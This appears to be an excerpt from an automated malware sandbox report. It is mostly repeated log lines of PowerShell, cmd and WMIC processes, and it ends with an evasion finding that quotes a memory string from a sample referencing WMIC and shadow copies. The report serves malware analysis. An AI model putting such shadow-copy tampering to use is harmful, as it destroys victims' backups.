Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Source: eryy65ty.exe, 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmp, eryy65ty.exe, 00000014.00000000.1580004166.0000000000EBB000.00000002.00000001.01000000.00000005.sdmp, eryy65ty.exe, 0000001B.00000000.1754914879.0000000000EBB000.00000002.00000001.01000000.00000005.sdmp, eryy65ty.exe, 0000001E.00000000.1837388986.0000000000EBB000.00000002.00000001.01000000.00000005.sdmp, eryy65ty.exe.14.drBinary or memory string: COULD NOT CREATE CHILD PROCESSWOW64DISABLEWOW64FSREDIRECTIONKERNEL32.DLLWOW64REVERTWOW64FSREDIRECTIONABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ\WMIC.EXE\..\\WBEM\\SYSTEM32\\WINDOWS\C:\SHADOWCOPY 